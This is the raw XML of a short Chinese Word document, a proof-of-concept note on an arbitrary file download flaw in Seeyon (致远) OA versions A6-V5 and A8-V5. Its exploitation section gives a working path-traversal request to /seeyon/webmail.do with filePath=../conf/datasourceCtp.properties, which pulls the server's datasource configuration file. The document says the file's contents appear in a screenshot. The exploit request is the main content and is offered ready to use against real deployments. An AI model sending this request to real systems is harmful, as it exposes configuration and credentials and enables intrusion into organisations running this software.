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999999" w:sz="4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660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FF6600"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/rab3it/p/14309574.html"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FF660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FF6600"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>致远OA 任意文件下载漏洞（webmail.do文件）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660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5"/>
          <w:szCs w:val="25"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>介绍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致远OA是北京致远互联软件股份有限公司研发一款办公系统。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5"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_label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5"/>
          <w:szCs w:val="25"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>漏洞详情及危害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致远OA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts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webmail.do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文件读取漏洞，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由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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/seeyon/webmail.do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 页面 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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filePath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 参数过滤不严，导致可以读取系统敏感文件。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通过修改filePath参数来下载服务器文件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Style w:val="8"/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/seeyon/webmail.do?method=doDownloadAtt&amp;filename=conf&amp;filePath=../conf/datasourceCtp.properties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5"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_label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5"/>
          <w:szCs w:val="25"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>影响范围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A6-V5、A8-V5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5"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_label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5"/>
          <w:szCs w:val="25"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>漏洞利用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访问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Style w:val="8"/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http://xx.xx.xxx.xx/seeyon/webmail.do?method=doDownloadAtt&amp;filename=conf&amp;filePath=../conf/datasourceCtp.properties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7485" cy="2480945"/>
            <wp:effectExtent l="0" t="0" r="10795" b="317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2480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Style w:val="8"/>
          <w:rFonts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datasourceCtp.properties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文件内容为：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24475" cy="1397635"/>
            <wp:effectExtent l="0" t="0" r="9525" b="44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397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716E9"/>
    <w:rsid w:val="076E241E"/>
    <w:rsid w:val="51C06D32"/>
    <w:rsid w:val="57946E21"/>
    <w:rsid w:val="703B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2021-02-19T03:14:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-19T03:15:42Z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